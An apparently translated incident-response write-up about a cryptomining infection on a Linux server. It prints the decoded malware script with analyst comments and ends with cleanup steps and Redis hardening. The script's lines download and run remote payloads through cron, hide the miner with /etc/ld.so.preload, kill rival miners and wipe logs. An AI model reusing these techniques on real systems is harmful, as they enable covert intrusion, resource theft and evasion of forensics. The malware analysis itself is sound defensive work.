Transferred from: 82347473
1. CPU usage was at 100%; `top` was used to inspect it.
2. The process consuming 100% CPU was killed.
3. It was suspected that the process was being hidden.
4. An extra job had been added to the scheduled tasks (cron).
5. Opening https://pastebin.com/raw/xbY7p5Tb returned the following content.
6. Opening https://pastebin.com/raw/uuYVPLXd returned a base64-encoded string.
7. Decoding it with base64 yielded the script below. (The listing is a machine-translated copy: command names are case-mangled and stray spaces were inserted into options and paths, so it is not runnable as shown; read it as an analysis artefact, not as working code.)
#! /Bin/bash
# NOTE(review): machine-translated copy of the decoded payload; case and
# spacing are mangled throughout, so the comments below describe what the
# visible lines indicate from an incident-response point of view.
Shell =/bin/sh
# Resets the search path so the bare command names used later (curl, wget,
# pkill, netstat) resolve from the listed system directories rather than
# from whatever PATH the caller (cron or a piped shell) had.
Path =/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Competitor-removal stage: kills other cryptominers so this sample has the
# CPU to itself. It matches processes by name (pkill -f), by pool hostname or
# port appearing in `ps` output, and by established connections in `netstat`
# output, then deletes their files. IR note: the names, paths, pool hosts and
# ports below are usable as indicators for other miner families that may
# also be present on the host.
Function kills (){
Pkill-F sourplum
Pkill wnkyg & pkill DDG * & Rm-RF/tmp/wnkyg
Rm-RF/boot/GRUB/deamon & Rm-RF/boot/GRUB/disk_genius
Rm-RF/tmp/* index_bak *
Rm-RF/tmp/* httpd. conf *
Rm-RF/tmp/* httpd. conf
Rm-RF/tmp/a7b0000c270
# Pool-based kills: any process whose `ps` line mentions one of these mining
# pools or binaries is killed with SIGKILL (kill -9), leaving no cleanup.
PS auxf | grep-V grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 8080" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 3333" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "monerohash.com" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "/tmp/a7b316c270" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 6666" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 7777" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmr. crypto-pool.fr: 443" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "stratum.f2pool.com: 8888" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmrpool. eu" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmrig" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmrigdaemon" | awk '{print $2}' | xargs kill-9
PS auxf | grep-V grep | grep "xmrigminer" | awk '{print $2}' | xargs kill-9
# Name-based kills. `pkill -f` matches anywhere in the full command line, so
# some of these patterns (irqbalance, polkitd, acpid, loopback, Conns) will
# also hit legitimate services or unrelated commands whose arguments contain
# the string — expect collateral service outages on an infected host.
Pkill-F biosetjenkins
Pkill-F anxqv. Yam
Pkill-F xmrigdaemon
Pkill-F xmrigminer
Pkill-F xmrig
Pkill-F loopback
Pkill-F apaceha
Pkill-F cryptonight
Pkill-F Stratum
Pkill-F mixnerdx
Pkill-F quit medl
Pkill-F jnkihgjn
Pkill-F irqba2anc1
Pkill-F irqba5xnc1
Pkill-F irqbnc1
Pkill-F ir29xc1
Pkill-F Conns
Pkill-F irqbalance
Pkill-F crypto-pool
Pkill-F minexmr
Pkill-F xjnrj
Pkill-F nxlai
Pkill-F bi5zj
Pkill-F askdljlqw
Pkill-F minerd
Pkill-F minergate
Pkill-F guard. Sh
Pkill-F ysaydh
Pkill-F bonns
Pkill-F donns
Pkill-F kxjd
Pkill-F duck. Sh
Pkill-F Bonn. Sh
Pkill-F conn. Sh
Pkill-F kworker34
Pkill-F kW. Sh
Pkill-F pro. Sh
Pkill-F polkitd
Pkill-F acpid
Pkill-F icb5o
Pkill-F nopxi
Pkill-F irqbalanc1
Pkill-F minerd
Pkill-F i586
Pkill-F GDDR
Pkill-F mstxmr
Pkill-F ddg.2011
Pkill-F wnkyg
Pkill-F deamon
Pkill-F disk_genius
Pkill-F sourplum
Pkill-F bashx
Pkill-F bashg
Pkill-F bashe
Pkill-F bashf
Pkill-F bashh
Pkill-F xbashy
Pkill-F libapache
# File cleanup of competitors' droppers and configs (mostly under /tmp).
Rm-RF/tmp/httpd. conf
Rm-RF/tmp/Conn
Rm-RF/tmp/root. sh/tmp/pools.txt/tmp/libapache/tmp/config. JSON/tmp/bashf/tmp/bashg/tmp/libapache
Rm-RF/tmp/Conns
Rm-F/tmp/IRQ. Sh
Rm-F/tmp/irqbalanc1
Rm-F/tmp/IRQ
Rm-F/tmp/kworkerds/bin/config. JSON
# Connection-based kills: takes the PID/program field (column 7) of
# `netstat -anp`, splits on '/' to get the PID, and kills it. The grep is an
# unanchored substring match on the whole line, so e.g. "3333" or "4444"
# also matches unrelated local ports or addresses containing those digits.
Netstat-anp | grep 69.28.55.86: 443 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 3333 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 4444 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 5555 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 6666 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 7777 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 3347 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 14444 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Netstat-anp | grep 5.196.225.222 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
# Port 13531 is only cleared when no 'kworkerds' process is running: the
# sample spares its own miner, and downloadrun/downloadrunxm below use the
# same port check to decide whether the miner needs (re)starting. For IR,
# a process bound to or connected on 13531 is the strongest live indicator.
Y = $ (PS aux | grep-V grep | grep kworkerds | WC-l)
If [$ {y}-EQ 0]; then
Netstat-anp | grep 13531 | awk '{print $7}' | awk-F' [/] ''{print $1} '| xargs kill-9
Fi
}
# Persistence stage: if /bin/httpdns is absent, fetches it from pastebin
# (curl first, wget as fallback), makes it executable, and registers it in
# /etc/crontab to run as root via /bin/sh. IR note: `sed -i '$ d'` deletes
# the last line of /etc/crontab, and as listed the redirect is `>` rather
# than `>>`, which would replace the whole file — confirm against the original
# sample before judging what of the legitimate /etc/crontab survives.
Function System (){
If [! -F "/bin/httpdns"]; then
Curl-fssl https://pastebin.com/raw/698D7kZU-O/bin/httpdns & chmod 755/bin/httpdns
If [! -F "/bin/httpdns"]; then
Wget https://pastebin.com/raw/698D7kZU-O/bin/httpdns & chmod 755/bin/httpdns
Fi
Sed-I '$ D'/etc/crontab & Echo-e "**/6 *** root/bin/sh/bin/httpdns">/etc/crontab
Fi
}
# Hiding and anti-forensics stage. Despite the name it does not run `top`:
# it drops a shared object (served as a .jpg) to /usr/local/lib/libntp.so and
# puts that path in /etc/ld.so.preload, so the library is loaded into every
# dynamically linked program — consistent with the article's observation that
# `top` no longer shows the miner. It then copies /bin/sh's timestamps onto
# the dropped files (touch -r) and truncates several logs.
Function top (){
If [! -F "/usr/local/lib/libntp. So"]; then
Curl-fssl http://thyrsi.com/t6/365/1535595427x-1404817712.jpg-O/usr/local/lib/libntp. So & chmod 755/usr/local/lib/libntp. So
If [! -F "/usr/local/lib/libntp. So"]; then
Wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg-O/usr/local/lib/libntp. So & chmod 755/usr/local/lib/libntp. So
Fi
Fi
# Creates /etc/ld.so.preload if missing; otherwise drops its last line and
# overwrites it. Either way the file ends up naming only libntp.so, so any
# legitimate preload entry is lost. Remediation must clean this file as
# well as deleting the .so, or every dynamic binary will report a preload error.
If [! -F "/etc/lD. So. preload"]; then
Echo/usr/local/lib/libntp. So>/etc/lD. So. Preload
Else
Sed-I '$ D'/etc/lD. So. preload & Echo/usr/local/lib/libntp. So>/etc/lD. So. Preload
Fi
# Timestamp tampering: access/modify times are copied from /bin/sh, so
# mtime-based triage of these paths is unreliable. libjdk.so is touched here
# but never created in this listing — possibly left over from another variant.
Touch-acmr/bin/sh/etc/lD. So. Preload
Touch-acmr/bin/sh/usr/local/lib/libjdk. So
Touch-acmr/bin/sh/usr/local/lib/libntp. So
# Log wiping: root's mailbox, login records (wtmp), auth log (secure) and
# cron log are overwritten with "0". Expect these local logs to be useless
# for timeline reconstruction; rely on remote syslog/auditd copies if any.
Echo 0>/var/spool/mail/root
Echo 0>/var/log/wtmp
Echo 0>/var/log/secure
Echo 0>/var/log/cron
}
# Python stage: runs a detached python one-liner that base64-decodes and
# exec()s an embedded payload, then creates the marker /tmp/.tmpa. The
# base64 payload itself is not reproduced on this page (the argument shown
# is a translator placeholder), so what it executes cannot be stated here.
# The main body only runs this stage while /tmp/.tmpa is absent.
Function Python (){
Nohup Python-c "Import base64; Exec (base64.b64decode ('pipeline authorization')">/dev/null 2> & 1 &
Touch/tmp/. tmpa
}
# Cron persistence stage: writes an entry into three cron locations
# (/etc/cron.d/root, /var/spool/cron/root, /var/spool/cron/crontabs/root)
# that re-downloads https://pastebin.com/raw/xbY7p5Tb and pipes it to sh,
# so the host is re-infected with whatever that paste currently holds. The
# schedule fields are garbled in this copy; the article's step 8A removes
# all three files. Timestamps are then copied from /bin/sh as in top().
Function echocron (){
Echo-e "*/10 * root/bin/chmod 755/usr/bin/curl &/usr/bin/curl-fssl https://pastebin.com/raw/xbY7p5Tb | sh \ n ## ">/etc/cron. d/root
Echo-e "*/30 */usr/bin/curl-fssl https://pastebin.com/raw/xbY7p5Tb | sh \ n #">/var/spool/cron/root
Mkdir-P/var/spool/cron/crontabs
Echo-e "**/10 ***/usr/bin/curl-fssl https://pastebin.com/raw/xbY7p5Tb | sh \ n #">/var/spool/cron/crontabs/root
Touch-acmr/bin/sh/etc/cron. d/root
Touch-acmr/bin/sh/var/spool/cron/crontabs
Touch-acmr/bin/sh/var/spool/cron/root
Touch-acmr/bin/sh/var/spool/cron/crontabs/root
}
# Miner launch stage (/tmp variant): if nothing on port 13531 shows up in
# `netstat -anp`, the miner is assumed not running. The binary is fetched
# (served as a .jpg) to /tmp/kworkerds if absent, made executable, and
# started detached via nohup; if the file already exists it is just started.
# The name mimics kernel worker threads ("kworker") to blend into `ps`.
Function downloadrun (){
PS = $ (netstat-anp | grep 13531 | WC-l)
If [$ {PS}-EQ 0]; then
If [! -F "/tmp/kworkerds"]; then
Curl-fssl http://thyrsi.com/t6/358/1534495127x-1404764247.jpg-O/tmp/kworkerds & chmod + x/tmp/kworkerds
If [! -F "/tmp/kworkerds"]; then
Wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg-O/tmp/kworkerds & chmod + x/tmp/kworkerds
Fi
Nohup/tmp/kworkerds>/dev/null 2> & 1 &
Else
Nohup/tmp/kworkerds>/dev/null 2> & 1 &
Fi
Fi
}
# Miner launch stage (/bin variant), used by the main body as a fallback when
# port 13531 is still quiet 10 seconds after downloadrun. Same port check,
# but it additionally drops a miner config to /bin/config.json and places the
# binary at /bin/kworkerds. IR note: /bin/config.json and /bin/kworkerds are
# not removed by the article's cleanup steps; check for them too.
Function downloadrunxm (){
PM = $ (netstat-anp | grep 13531 | WC-l)
If [$ {pm}-EQ 0]; then
If [! -F "/bin/config. JSON"]; then
Curl-fssl http://thyrsi.com/t6/358/1534496022x-1404764583.jpg-O/bin/config. JSON & chmod + x/bin/config. JSON
If [! -F "/bin/config. JSON"]; then
Wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg-O/bin/config. JSON & chmod + x/bin/config. JSON
Fi
Fi
If [! -F "/bin/kworkerds"]; then
Curl-fssl http://thyrsi.com/t6/358/1534491798x-1404764420.jpg-O/bin/kworkerds & chmod + x/bin/kworkerds
If [! -F "/bin/kworkerds"]; then
Wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg-O/bin/kworkerds & chmod + x/bin/kworkerds
Fi
Nohup/bin/kworkerds>/dev/null 2> & 1 &
Else
Nohup/bin/kworkerds>/dev/null 2> & 1 &
Fi
Fi
}
# Main body. First fetches a control value from pastebin (C4ZhQFrH). If the
# paste says "update", the sample wipes its own miner files and lock and only
# re-installs the cron entries — effectively a remote "reinstall on next cron
# run" switch. Otherwise it runs the full infection sequence in order:
# optional Python stage (gated on the /tmp/.tmpa marker), competitor kills,
# miner launch, cron persistence, /bin/httpdns persistence, preload hiding
# and log wiping, then after 10 s retries the miner via the /bin variant if
# port 13531 is still not in use.
Update = $ (curl-fssl -- connect-Timeout 120 https://pastebin.com/raw/C4ZhQFrH)
If [$ {update} X = "Update" X]; then
Rm-RF/tmp/lock */bin/kworkerds/bin/config. JSON/tmp/kworkerds/root/kworkerds
Echocron
Else
# /tmp/.tmpa is the marker touched by the Python stage; its absence means the
# stage has not run yet (or was cleaned), so /tmp/.tmp is removed and it runs.
If [! -F "/tmp/. tmpa"]; then
Rm-RF/tmp/. tmp
Python
Fi
Kills
Downloadrun
Echocron
System
Top
Sleep 10
# Port 13531 quiet after the wait → assume /tmp/kworkerds failed to start
# and fall back to the /bin copy.
Port = $ (netstat-anp | grep 13531 | WC-l)
If [$ {port}-EQ 0]; then
Downloadrunxm
Fi
Fi
#
#
8. Remediation, based on the script above:
A. Remove the cron persistence first.
rm -rf /etc/cron.d/root
rm -rf /var/spool/cron/crontabs
rm -rf /var/spool/cron/root    (the script only used /bin/sh as a timestamp reference for `touch -r`; do not include /bin/sh in this command)
B. Remove the script that /etc/crontab re-runs after a restart (check /etc/crontab for the entry as well).
rm -rf /bin/httpdns
C. Remove the miner executable.
rm -rf /tmp/kworkerds
D. Remove the shared library that tampers with the `top` display (because of it, `top` does not show the mining process). The script also writes this path into /etc/ld.so.preload, so remove that entry as well, otherwise every dynamically linked program will try to preload the deleted file.
rm -rf /usr/local/lib/libntp.so
E. Delete the marker file created by the Python stage.
rm -rf /tmp/.tmpa
F. Use `top` to find the CPU-consuming process.
G. Kill that process.
9. Change the Redis password, and preferably set `bind 127.0.0.1` so Redis is not reachable from outside the host.
Mining malware qw3xt.2 — final solution